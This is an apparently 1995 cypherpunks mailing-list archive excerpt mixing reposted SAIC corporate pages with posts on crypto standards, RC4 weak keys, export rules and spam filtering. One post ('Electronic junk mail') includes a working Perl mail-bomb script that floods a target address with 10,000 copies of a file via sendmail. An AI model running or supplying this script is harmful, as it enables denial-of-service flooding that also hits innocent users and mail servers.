   Applications International Corporation (SAIC) now ranks as 
the
   nation's largest employee-owned high-tech company. With 
annual
   revenues of $1.6 billion, SAIC has almost 4,000 employees in 
San
   Diego, and about 16,000 employees at more than 250 locations
   worldwide.
   
    SAIC offers broad expertise in technology development and 
analysis,
   computer system development and integration, technical 
support
   services, and computer hardware and software products. SAIC 
scientists
   and engineers work to solve complex technical problems in 
business
   areas that include environment, energy, health, 
transportation and
   space.
   
    Since the beginning, SAIC has been committed to making 
significant
   contributions to nationally important programs. Over the 
past two
   decades, SAIC technical staff have contributed to clean-up 
efforts at
   Three Mile Island and Prince William Sound, to the success 
of
   Operation Desert Storm, and to space missions ranging from 
Voyager to
   the shuttle flights. The company is helping develop new 
technology to
   clean up hazardous waste at Superfund sites, while other 
scientists
   are studying global climate and oceanographic changes. In 
another
   critical area, SAIC is increasing the quality of patient 
care while
   lowering costs by developing an automated patient record 
system for
   Department of Defense medical facilities.
   
    Today, SAIC generates about 90 percent of its business 
through
   federal government contracts, half of which are in the 
national
   security area. The company has been transitioning its 
extensive
   experience in advanced defense systems and software 
engineering to
   benefit civilian programs. For example, SAIC networking 
capability
   helps dozens of government agencies share information to 
fight drug
   smuggling, and integrates technology that has put a 
pollution-free bus
   on the road.
   
    Bob Beyster, SAIC's founder and chief executive officer, 
credits the
   success of the company to its employee ownership.
   
    "The hallmark of SAIC through the years has been the 
principle that
   those who contribute to the company should own it, with that 
ownership
   proportional to their contribution and performance as much 
as
   possible," Beyster says, "SAIC was designed for professional 
people
   who want to do superior scientific and technical work, who 
want to
   have a stake and a voice in the company's development and 
direction,
   and who expect fair rewards for doing excellent work."
   
_________________________________________________________________

   
   Copyright SAIC Home
_________________________________________________________________

 
    Last updated on 07-05-95

----------


URL: http://www.itps.saic.com/websites.htm


Other SAIC Web Sites:

    
_________________________________________________________________

   
   Foundation for Enterprise Development
   
   SAIC Advanced Technology and Analysis Sector
   
   SAIC Aeronautical Systems Operation
   
   SAIC Applied Physics Operation
   
   SAIC ASDI (SEE Program)
   
   SAIC Asset C3I Group
   
   SAIC Hampton's Information System
   
   SAIC HTTP Server Site
   
   SAIC Idaho Falls ID
   
   SAIC Ideas Group
   
   SAIC Information and Simulation Sciences
   
   SAIC Information Technology Group
   
   SAIC Information Technology Lab
   
   SAIC JSTARS MOT&E Office
   
   SAIC @ Langley Research Center
   
   SAIC Los Altos
   
   SAIC Medical Imaging
   
   SAIC @ New Mexico
   
   SAIC Open Systems Lab
   
   SAIC Security Web Site
   
   SAIC Space Sciences
   
   SAIC Sterling Heights, Michigan
   
   SAIC System Development Operation Center
   
   SAIC Systems Engineering
   
   SAIC Technology Solution Sector
   
   SAIC Telecommunications Information Engineering Organization
   
   SAIC Test and Evaluation Group
   
   SAICnet Gopher
   
     
_________________________________________________________________

   
   SAIC-Hosted/Created Sites:
   
   Smart Site
   
   City of Ridgecrest Homepage






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Fri, 29 Sep 95 19:15:12 PDT
To: cypherpunks@toad.com
Subject: ESM under ULTRIX?
Message-ID: <199509300215.AA06751@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain



I'm having some trouble getting ESM to work under DEC Ultrix.  Has
anyone gotten this to work?  My first problem was that Ultrix doesn't
understand one of the constants passed to an ioctl.  With the help of
a Linux box, I got the value of the constant and plugged it in.  
	Now ESM compiles, says randomizing........, then does a carriage
return and just dies.  Ctrl-C doesn't work, Ctrl-Z doesn't work. 
Further I know that it's dying somewhere before the ioctl.  Anyone one
know how to make this work?  For reference,
> uname -a                      
ULTRIX bigwpi.WPI.EDU 4.5 0 RISC
>                               

						Dan

***************************************************************
#define private public						dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Fri, 29 Sep 95 19:22:04 PDT
To: cypherpunks@toad.com
Subject: Re: SAIC bought InterNic, but who is SAIC?  A spook contractor!
Message-ID: <199509300221.WAA00326@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://opentext.uunet.ca:8080/omw/simplesearch
  
   
   The Open Text Index found 199 pages containing: Science
   Applications International Corporation.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Allen <ChristopherA@consensus.com>
Date: Fri, 29 Sep 95 22:26:13 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: X.509, S/MIME, and evolution of PGP
Message-ID: <v02130505ac9269af6219@[157.22.240.12]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:22 PM 9/27/95, Bill Stewart wrote:
>2) RSA patent - can this be built with RSAREF?  Or RSAREF with permission
>for a couple extra activities?  Or built out of RIPEM or RIPEM-SIG?
>The latter has the benefit of already being exportable.

It certainly can be built from RSAREF, as I use my Apple DigiSign X.509 key
(ultimately created with TIPEM in the Mac system software) with RIPEM/Mac
(which uses RSAREF.)

Some additional info: my company, Consensus Development, has commercial
rights to license developers RSAREF also has a good relationship with
VeriSign. We helping them writea variety of tools to make issuing X.509
certs easier.

>5) S/MIME - real S/MIME compliance requires support for RC2 as well as
>publicly available algorithms, though this is really just an X.509 handler.

I've been working on getting RC2/RC4 in object-only exportable size key
form from RSA for RSAREF customers, and Jim Bidzos has agreed in principle.
We have to work out details, however.

>6) It's a lot of work - well, yeah, it is.  And I'm lazy.  Is there enough
>related code in SSLeay to steal to help implement it?

I spoke with Eric yesterday and I think he was working on some ASN.1
related classes for a future version of SSLeay.

------------------------------------------------------------------------
..Christopher Allen                  Consensus Development Corporation..
..<ChristopherA@consensus.com>                 1563 Solano Avenue #355..
..                                             Berkeley, CA 94707-2116..
..<http://www.consensus.com/>             o510/559-1500  f510/559-1505..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John D. Ervin" <jervin@netpath.net>
Date: Fri, 29 Sep 95 20:13:48 PDT
To: cypherpunks@toad.com
Subject: Export/import of chips
Message-ID: <199509300315.XAA01062@server1.netpath.net>
MIME-Version: 1.0
Content-Type: text/plain


I deal with Importers from Taiwen, Hong kong, Korea, and China on a daily
basis. 

Because the deals I get on components is very good...

They are name brand and meet FCC Standards when assembled as systems, but when 
imported as components they are generally worthless, until assembled

How is import or export of Encryption related components monitored ??

Microprocessors can be imported and exported, as can boards..
As Junk....

Nobody Checks these shipments ??

Now if some of those boards did encryption/decryption, and they were paired
with a processor, They could do some damage..

But when imported and exported as components (ie Electronic Junk) who is to
tell what the end usage is really for ??

This is how a Toyota, Datsun, Subaru, etc are really American built and are
American Cars.....
-------------------------------------------------
jervin@netpath.net


-------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 29 Sep 95 15:40:21 PDT
To: cypherpunks@toad.com
Subject: Call for IT Sec XX
Message-ID: <199509292240.XAA16987@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



From: <http://www.xiwt.org/secpros1.htm>


                      Call for White Papers

     Information Technology Security Policy Setting Process

                          issued by the

                   Cross-Industry Working Team

                  Thursday, September 28, 1995


Introduction

The Cross-Industry Working Team (XIWT) is seeking inputs from 
U.S.
industry on ways to improve the process by which public policy 
on
information technology  systems security is developed. At the
invitation of the Information Infrastructure Task Force (IITF) 
of
the U.S. government, XIWT is soliciting ideas broadly from US
industry, in the form of White Papers that address this issue. 
XIWT
will, later this year, convene a workshop of industry experts 
to
organize the ideas and suggestions expressed in these White 
Papers
into a report for use by the IITF, and will prepare a report to 
be
made available to the public.

XIWT is a multi-industry coalition of organizations committed 
to
defining the architecture and key technical requirements for a
powerful and sustainable national information infrastructure 
(NII).
XIWT aims to foster the understanding, development and 
application
of technologies that cross industry boundaries; facilitate the
conversion of the NII vision into real-world implementations, 
and
facilitate a dialogue among representatives of stakeholders in 
the
private and public sector. Additional information about XIWT 
can be
found on the Internet at: http://www.xiwt.org/homepage.


Information Technology Systems Security

In the developing National Information Infrastructure (NII),
information technology will be deployed in a wide range of 
contexts
and systems including communications, computing, software 
systems,
and many different types of applications. The ability of this
technology, and the systems which employ it, to provide the
requisite levels of security and protection, are of concern to
almost everyone.

Issues of central concern include: physical protection of 
systems
and their contents, potential vulnerabilities at various points
within the networked environments of these systems, and the 
ability
to provide or even guarantee reliable and/or uninterruptable
service. The infrastructure for such capabilities will need to
include mechanisms for the protection of networks, computers 
and
other types of equipment as well as systems that employ these
elements, as well as methods for analysis, certification and
validation of technology and systems, and for facilitating the
setting of standards. It is likely that cryptographic 
capabilities
will need to be available throughout for possible use in 
protection
and authentication of information. Issues involving the 
management
of  these capabilities will need to be uncovered, discussed and
resolved where possible. At present, the federal government has 
no
formal process in place, in the Congress or in Executive Branch
agencies, which adequately involves the private sector in the
determination of public policy in this area.

Responsibilities for this broad area within the federal 
government
are widely diffused and do not necessarily insure that all the
relevant concerns of the private sector are taken into account.
Further, no single process is used by the various parts of the
federal government and a variety of policies, reflected in 
laws,
regulation and practice, usually result. A methodology is 
required
by which private sector interests can be adequately expressed 
and
factored into resulting policies. The purpose of this call for
white papers is to request written inputs from interested and
knowledgable parties on how the formal process to developing
information technology systems security policies may be 
improved,
and particularly on how private sector inputs can be most
effectively incorporated.

Specifically, industry is requested to identify those areas,
domains, and issues that are especially relevant for 
consideration,
and to recommend specific suggestions or approaches by which 
the
policy determination process in these areas may be improved. 
This
may entail, for example,  the establishment of one or more 
bodies
dedicated to this purpose, within or across domains; the 
creation
of a broad set of principles for the government or other bodies 
to
employ; the setting of national goals or other specific
recommendations for federal action.


Submissions

White papers are specifically solicited from U.S. industry; 
other
individuals who wish to contribute are welcome to do so.
Submissions may be made on paper or electronically by sending
electronic mail, document files, or via a form located on the 
XIWT
World Wide Web server (addresses below). Submissions made on 
behalf
of companies will be taken to represent the views of the firm;
these will be verified if it is not made clear in the 
submission
that the document represents a company position. Individual
submissions will not be verified if they do not claim to 
represent
company positions.

Submissions should be: 1) responsive to the primary goal of 
this
call, (focused specifically on process improvement and not the
presentation of  view on policy deficiencies or on desired
policies); 2) clear in terms of specific topics, areas or 
domains
of policy; 3) reasonably direct, brief and timely.

Any format may be used for the white paper, and it may be of 
any
length. However, submissions must include the following
information, on envelopes or headers to email and web messages, 
and
on the submission document, whatever its form:

1.   The name of individual making the submission;

2.   The name of firm on whose behalf the submission is made;

3.   The return address by which submission may be verified, if
     necessary.

XIWT will convene a one or two day  invitational workshop in 
the
Washington DC area in December, 1995, to review submissions and
organize the preparation of findings. Papers received by 
November
15, 1995, will be used in the workshop.  The report of this 
effort
is intended to be made available in February, 1996.

Submissions must be made to one of the following addresses:

Conventional Mail:

     Security Policy Process
     XIWT
     1895 Preston White Drive
     Suite 100
     Reston VA 22091-0913

Electronic Mail:

     secpros@cnri.reston.va.us

Please place: "Security Policy Process" in the "Subject:" 
field.
Please use ASCII text in any attachments.

World Wide Web: suggestions may be contributed via the internet 

at: http://www.xiwt.org/response


The content of submissions will be used by XIWT only for the
purposes described in this call. No specific attribution to
individual companies or individuals will be made in the 
findings or
report. We look forward to your help in this important national
effort.

For additional information, please contact Charles Brownstein 
or
Pam Memmott 
Tel:  (703) 620-8990
Internet: cbrownst@cnri.reston.va.us
Internet: pmemmott@cnri.reston.va.us


9/22/95; PJM







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 29 Sep 95 23:58:27 PDT
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <199509300658.XAA03050@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


In addition to being totally off topic and spamming lots of lists, 
Terra Libra is selling Ponzi schemes and pyramid schemes.

This is just "make money fast" elaborately dressed in libertarian
rhetoric.


At 07:11 AM 9/28/95 +0100, Anonymous wrote:
>   This is the best description of debt currency I've seen. Debt currency
>is today's most effective form of slavery. It is today's American slavery.
>
>                The text is from the book:
>
>               THE ECONOMIC RAPE OF AMERICA
>                 WHAT YOU CAN DO ABOUT IT
>
>by Frederick Mann of Terra Libra
>
>The book costs $19.95 plus $2 postage and handling.
>It can be ordered from:
>
>Terra Libra
>2430 E. Roosevelt #998
>Phoenix, Az 85008
>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 29 Sep 95 21:40:21 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Hack Microsoft
In-Reply-To: <199509291635.JAA06820@infinity.c2.org>
Message-ID: <199509300443.AAA28911@homeport.org>
MIME-Version: 1.0
Content-Type: text


Perry writes:

> Thats almost an invitation to hack Microsoft's web products, isn't it?
> 
> (Anyone from Netscape care to join in the fun?)
> 
> Perry

	While this might been read as a sarcastic comment, I'll
suggest that it really is excellent advice from Perry.  Like
cryptosystem design, secure software is best written by those with
experience breaking other people's system.

	Encouraging Netscape programmers to hack at SST will result in
embarassing disclosures for Microsoft, and better code for Netscape.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 30 Sep 95 01:28:33 PDT
To: Christopher Allen <ChristopherA@consensus.com>
Subject: Re: X.509, S/MIME, and evolution of PGP
Message-ID: <199509300828.BAA00347@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:29 PM 9/29/95 -0700, Christopher Allen <ChristopherA@consensus.com> wrote:
>At 3:22 PM 9/27/95, Bill Stewart wrote:
>>5) S/MIME - real S/MIME compliance requires support for RC2 as well as
>>publicly available algorithms, though this is really just an X.509 handler.
>I've been working on getting RC2/RC4 in object-only exportable size key
>form from RSA for RSAREF customers, and Jim Bidzos has agreed in principle.
>We have to work out details, however.

Sounds good, but having publicly implementable standards would be nicer;
licensable patented code is enough of a hassle, without having standards
that have *trade secrets* built into them.  RC2 as an option is fine;
RC2 as a mandatory part of a conforming implementation is pretty tacky.

>>6) It's a lot of work - well, yeah, it is.  And I'm lazy.  Is there enough
>>related code in SSLeay to steal to help implement it?

Actually, it turns out that the latest RIPEM has certificate chains, Web of
Trust,
and really just about everything I want, except perhaps user-friendly GUIs,
which could be added easily enough.  I haven't yet sorted out which
parts are in the export-approved RIPEM-SIG and which parts are only in RIPEM2.1,
but it's a pretty straightforward job.  (Now to go scrounge some disk space!)
The RIPEM code is all public-domain, and uses RSAREF for its crypto,
so exporting the non-RSAREF parts is copyright/patent clean, and maybe
it can be possible to put together a CJ-able version of the new stuff
so it can gain legitimacy after having been exported for months :-)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ford Prefect <remailer@bi-node.zerberus.de>
Date: Fri, 29 Sep 95 18:34:21 PDT
To: cypherpunks@toad.com
Subject: Re: Electronic junk mail (one solution)
Message-ID: <m0syqoP-0002ThC@bi-node.zerberus.de>
MIME-Version: 1.0
Content-Type: text/plain


OK...I know this borders on a "denial of service" attack since it may 
effect innocent users. How would you like to be the one to explain to  
your System Administrator that the Megabytes of returned Spam on the 
disk are yours? 
I realize that some peoples implementations of Sendmail will tell who
your are regardless, so you might have to modify the "system" line for
your own tastes. Also you might *not* want to be anon. Please feel
free to modify to your own tastes. The delay loop is to space out 
the load. I also tried it with premail instead of Sendmail and it
went thru the remailers just fine. It should be capable of running 
in the background. Only took 5 minutes to write and a couple of 
remailers to test.
============================================================
#!/usr/bin/perl
print "Who does this go to?: ";
chop($name = <STDIN>);
print "What is the filename to send?: ";
chop($filename = <STDIN>);
for ($a=0;$a<100;$a++) {
for ($b=0;$b<100;$b++) {
system ("/usr/lib/sendmail -f nobody $name < $filename");
for ($x=0;$x<600000;$x++){};
}
}
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@dg.thepoint.net>
Date: Sat, 30 Sep 95 02:32:26 PDT
To: David Taffs <dat@ebt.com>
Subject: Re: [revcoal@pcnet.com: Re: The owls are not what they seem]
In-Reply-To: <9509151740.AA06675@veronica.EBT.COM>
Message-ID: <Pine.D-G.3.91.950930053733.23110K-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Sep 1995, David Taffs wrote:

> 
> fyi...
> 
> Date: Fri, 15 Sep 1995 00:02:33 -0400 (EDT)
> From: "Donna J. Logan" <revcoal@pcnet.com>
> ... 
> BTW, I'm being cagey in actually mentioning your service provider's name/
> initials, as we found that was one of the "keywords" in the filter program
> used by them and a certain national police agency (who's initials also 
> trigger the filter program) to flag posts which they thought may be 
> "interesting", resulting in delays of up to days in posting.  Same thing
> happened in live chat in PRIVATE chat rooms, we were able to bring the
> system to a complete halt by just typing the initials of Frederico's
> Bumbling Idiots....                                      ^^^^^^^^^^^
  ^^^^^^^^^^^^^^^
It may amuse you to know that some other federal law enforcement agencies 
refer to Fred's bunch as "Famous But Incompetent."

But then their TV show got canceled ....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 30 Sep 95 03:42:15 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Cryptanalysis of RC4 - Preliminary Results (Repeat)
In-Reply-To: <199509291716.KAA06460@ix8.ix.netcom.com>
Message-ID: <9509301040.AA02608@all.net>
MIME-Version: 1.0
Content-Type: text


...
> >The attack is based on two particularly interesting three-byte key
> >prefixes which have a high probability of producing PRNG sequences
> >which start with a known two-byte sequence. The prefixes are:
> >1.  Keys starting with "00 00 FD" which have a 14% probability of
> >    generating sequences which start "00 00".
> >2.  Keys starting with "03 FD FC" which have a 5% probability of
> >    generating sequences which start "FF 03".
> [much interesting work deleted]
> 
> It sounds like any application using RC4 with random session keys
> should start by testing session keys and rejecting any that
> start with 00 00 or 03 FD; it means doing 2**-15 more random key
> generations, and reducing the brute-force space by 2**-15,
> but it's a pretty small reduction.

The problem is that if these keys are weak, there may be many others
that are also weak.  In fact, by the time we explore all of the
weaknesses, we may find the system is no longer very strong at all. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Cancelmoose[tm]" <moose@cm.org>
Date: Fri, 29 Sep 95 23:41:46 PDT
To: wilcoxb@nagina.cs.colorado.edu (Bryce Wilcox)
Subject: Re: "alt.cypherpunks" Newsgroup vs. Mailing List?
In-Reply-To: <199509162353.RAA06965@nagina.cs.colorado.edu>
Message-ID: <19950930064113.AXK11529@cm.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Several people are working on improvements to netnews which allow more active
> filtering.  The most promising techniques that I have heard about involve a
> lot of "ratings" being generated by readers and then taken into account by
> other readers when filtering/sorting the articles.
<
> I don't know if the technology is there yet, or if it is accessible to most
> of our readers.  One person who is working on such a scheme is "(cm)", or 
> "na48985@anon.penet.fi".  I have added his name to the Cc: line so perhaps he
> would be so kind as to tell us about his "NoCeM" ("No see 'em!") software.


(Please note the new email address-- moose@cm.org).

I apologize for the delay in responding to your message -- I will be
putting a lot of information about NoCeM up on http://www.cm.org in
the next day or so.  You can also find information in the newsgroup
alt.nocem.misc (if you get it).

If these don't work for you, feel free to write to me, and I'd be
happy to send you whatever you need.

(cm)

=-=-=-=-=
Please note new address: moose@cm.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:04:19 PDT
To: cypherpunks@toad.com
Subject: RTR-3 Package/Bomb Inspection System
Message-ID: <199509301104.HAA21361@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/products/rtis/rtr3.html


   *** Products and Services ***
     
_________________________________________________________________

   
RTR-3

   
   [RTR-3 Package/Bomb Inspection System] (Click on the image 
to see a
   larger, 268 kb. photo.)
   
   Is a rugged one-man portable system for digital X-ray 
imaging in the
   field.
   
        The RTR-3 is a safe efficient tool for a wide range of 
Security
        applications.
        
   o It is ideal for: Small package inspection/bomb detection;
          Unexploded ordnance evaluation; Point-of-entry and 
Customs
          contraband detection; Nondestructive search and 
evaluation.
          
   o Quick and easy to set up, simple to operate with either 
battery or
          line voltage.
         
   o Lightweight (under 10 pounds), compact electronic imager 
with 8x10
          inch X-ray sensor. Images are displayed immediately 
after
          acquisition on the flat panel display.
          
   o Portable, lightweight (25 pounds with batteries) 
integrated
          control unit with 9.5-inch flat panel image display.
          
   o Single package portable X-ray source. Portable sources are 
used
          with either battery or line voltage.
          
   o RTR-3 images are archived digitally and can be transmitted 
by
          modem, or floppy disk, to other computers for more 
detailed
          evaluation, and /or to assemble a database.
          
          [RTR-3 Pipe bomb X-ray] (Click on the image to see a 
larger,
          156 kb. photo.)
          
          RTR-3 is a complete, one-man portable X-ray system 
capable of
          acquiring, enhancing, archiving, and transmitting 
radioscopic
          images in the field.
          
          The portable generator produces 20-25 very short 
bursts of
          X-rays in approximately one second during image 
acquisition
          resulting in very safe field operation.
          
          A familiar Microsoft Windows user interface permits 
efficient
          operation of the system and provides acess to many 
image
          enhancement capabilities of the digital image 
processor.
          
          The RTR-3 features contrast stretch, zoom, pan and 
scroll,
          sharpening, smoothing, storage to hard or floppy 
disk, and
          transmission of images by modem.
          
          The RTR-3 ships in two rugged light-weight containers 
for
          maximum field portability.
          
          Click here for SPEC sheet.
          
          For more information, comments, or questions, send 
email to
          John Reed (619) 458-3797 or to Nicholas Vagelatos 
(619)
          458-3769, Fax (619) 458-3718.
          
            
__________________________________________________________
          
          The right to download and store or output this 
information is
          granted to users for their personal use only. Any 
other
          reproduction, by any means mechanical or electronic, 
without
          the express written permission of Science 
Applications
          International Corp. is strictly prohibited. (C) 
Copyright,
          1995, SAIC. All rights reserved. 
            
__________________________________________________________
          
          Copyright SAIC Home
            
__________________________________________________________
          
    Last updated on 07-10-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:09:16 PDT
To: cypherpunks@toad.com
Subject: Computer Misuse Detection System
Message-ID: <199509301109.HAA21436@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/products/cmds/index.html


   *** Products and Services ***
     
_________________________________________________________________

   
                       COMPUTER MISUSE DETECTION SYSTEM
                                       
                [CMDS]
                
   Caught in the Act
          Until now, computer misuse could not be detected 
until after
          the damage was done. With CMDS, the system alerts you 
to
          suspicious computer activity as it takes place so you 
can react
          immediately.
          
   Round the Clock Security
          CMDS never sleeps. Computer misuse characteristically 
takes
          place at times when you are not expecting it. If an 
intruder
          rattles your door knob at 2:00 AM, CMDS is there to 
watch the
          shop.
          
   Make the Intruders Think Twice
          Knowing that security software of this type is 
installed will
          give the potential misusers reason to reconsider 
their actions.
          CMDS affects the intruder's motivations by 
threatening them
          with unseen protection. Like police radar, they won't 
know it's
          there until they've been caught!
          
   Security Through Pictures
          If a picture is worth a thousand words and then CMDS 
speaks
          volumes about the security status of your network. 
The security
          trending reports show you, graphically, all the 
information you
          need to identify the intruders.
          
   Off-the-Rack or Tailor Made
          A well made suit off-the-rack can meet the needs of 
most people
          at tremendous cost savings. However, a tailor-made 
suit may be
          necessary when the person in need has special 
requirements.
          SAIC can tailor a system using CMDS core technology 
to meet any
          large heterogeneous network or detection 
requirements.
          
   Increase Efficiency While Reducing Cost, Time Spent, and 
Losses
          CMDS will increase efficiency of your security 
operations by
          performing faster than a manual review process. Your 
security
          staff will be freed up for other activities reducing 
your
          overall cost. Your losses will decrease through the 
deterrence
          and detection capabilities of CMDS.
          
   
     
_________________________________________________________________

   
More About CMDS...

          o Detecting Computer Crime
          o Product Description
          o Designed to Detect
          o Detection Capabilities
          o System Requirements
          o Licensing and More Information
          
   
     
_________________________________________________________________

   
Intrusion Detection Research Papers

          Audit Reduction and Misuse Detection in Heterogeneous
          Environments: Framework and Application.
          Click here to download Macintosh Microsoft Word 5.1 
file
          (464K).
          
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 07-10-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:13:37 PDT
To: cypherpunks@toad.com
Subject: SAIC Acquires Network Solutions
Message-ID: <199509301113.HAA21552@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/corporate/news/news03-15-95.html


   *** About SAIC ***
  
     
_________________________________________________________________

   
   SAIC ACQUIRES NETWORK SOLUTIONS, INC.
   
   (MCLEAN, VA) March 15, 1995 -- Science Applications 
International
   Corporation (SAIC) has acquired Network Solutions, Inc., a 
world
   leader in networking technology and applications.
   
   Network Solutions, Inc. is headquartered in Herndon, 
Virginia and will
   become a wholly owned subsidiary of SAIC. Terms of the 
acquisition
   were not disclosed.
   
   Network Solutions, Inc. was established in 1979 and has 
major clients
   in the federal government market, state and local market, 
and
   commercial market. Network Solutions, Inc. manages the 
worldwide
   registration services for the Internet and has significant 
expertise
   in local and wide area interoperability technologies. 
Network
   Solutions, Inc. currently supports two major Network 
Information
   Centers: The InterNIC and the Defense Data Network NIC.
   
   "The addition of Network Solutions, Inc. to SAIC brings a 
world-class
   networking business into our growing complex of 
communications and
   computing capability," said Dr. J. Robert Beyster, founder, 
chairman
   and chief executive officer of SAIC. "We see growth in this 
market
   segment as unlimited for us in the future."
   
   "We are extremely pleased to have Network Solutions, Inc. 
joining one
   of the most dynamic and successful growth firms in the 
world," said
   Emmit J. McHenry, chief executive officer of Network 
Solutions, Inc.
   "We anticipate explosive growth as we combine our networking 
expertise
   and experience with SAIC, a recognized leader in information
   technology and systems integration. The size and scope of 
SAIC will
   allow us to deliver our recognized excellence to a worldwide 
market."
   
   "The acquisition of Network Solutions, Inc. is the key next 
step in
   our strategy of building a full spectrum, full service 
global
   information technology business," said Michael A. Daniels, 
senior vice
   president and general manager of the Technology Applications 
Sector of
   SAIC. "We now work with clients on major engagements in the 
federal
   government market, the commercial market, and the state and 
local
   government market in both the United States and overseas. 
With the
   acquisition of Network Solutions, Inc. we complete the 
technology
   offering of our Systems and Network Integration line of 
business."
   
   SAIC is the largest employee-owned, high technology services 
and
   products company based in the United States. SAIC has annual 
revenues
   of $1.9billion, 20,000 employees and over 300 office 
locations around
   the world. High technology services and products are focused 
in the
   core lines of business of information technology, systems 
integration,
   energy, environment, medical and health care systems and
   transportation. Founded in 1969, SAIC has completed its 26th
   consecutive year of record revenue and earnings.
   
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 07-05-95






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Sat, 30 Sep 95 04:16:25 PDT
To: cypherpunks@toad.com
Subject: SAIC Shows Crime-Fighting Technology
Message-ID: <199509301116.HAA21636@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.saic.com/corporate/news/news03-17-95.html


   *** About SAIC ***
   
     
_________________________________________________________________

   
   SAIC SHOWS CRIME-FIGHTING TECHNOLOGY
   
   (SAN DIEGO, CA) March 17, 1995 -- Illegal contraband hidden 
in trucks,
   boats and airplanes can be detected with the assistance of
   state-of-the-art technology developed by Science 
Applications
   International Corporation (SAIC).
   
    The portable system is being demonstrated Friday as part of 
the
   opening of the federal Border Research and Technology Center 
at the
   Otay Mesa port-of-entry. The center, which has been 
established
   through the efforts of San Diego U.S. Attorney Alan D. 
Bersin, will be
   the focal point for driving the design, development, 
manufacture and
   acquisition of specialized law-enforcement technologies. The 
center is
   expected to identify specific programs for development that 
could be
   used by a variety of law-enforcement agencies.
   
   Various technologies for fighting cross-border crime will be
   demonstrated during a mock Otay border crossing by a driver 
attempting
   to evade the law.
   
   San Diego-based SAIC's portable contraband detection system 
scans
   inaccessible areas such as wheel wells, bumpers, boat hulls 
and
   aircraft fuselages. The system uses a micro-processor, a
   self-contained low-level radioactive sources and a sensitive 
detector.
   As surfaces are scanned, concealed objects including 
weapons,
   narcotics, alcohol and explosives reflect the radiation, 
which is
   sensed by the detector.
   
   The system operator is alerted by both a backlit digital 
display,
   visible in all light conditions, and an audio beeper that 
increases in
   rate as the contraband is detected. The handheld system's 
total weight
   is about two pounds.
   
   SAIC also will show how vehicles can be "tagged" by radio 
transponders
   which can provide positive identification of cars, trucks or 
trains
   passing through a specific area. Already in use by several
   SAIC-equipped automated toll collection systems across the 
U.S, the
   transponders or "tags" are issued to specific vehicles. 
Attached to
   bumpers or placed on dashboards, the tags are read as the 
vehicle
   passes near an antenna installed over or at the side of the 
roadway.
   The signal is displayed on a computer screen, and the data 
is stored
   and available for further use.
   
   The system could be used to speed commuters or other 
law-abiding
   vehicles regularly crossing the border. Violators can be 
caught
   because the "smart" system senses when a vehicle crosses 
without a
   tag, and can trigger alarms, crossing gates or other 
barriers, as well
   as recording the violator on video tape. Operators can 
electronically
   enhance license plate photos to be read clearly and process
   enforcement action.
   
   "We at SAIC are encouraged by the opening of the Border 
Research
   Technology Center today. This Center will provide the 
opportunity to
   apply high-technology solutions in support of increased 
trade as a
   result of NAFTA as well as support national law enforcement 
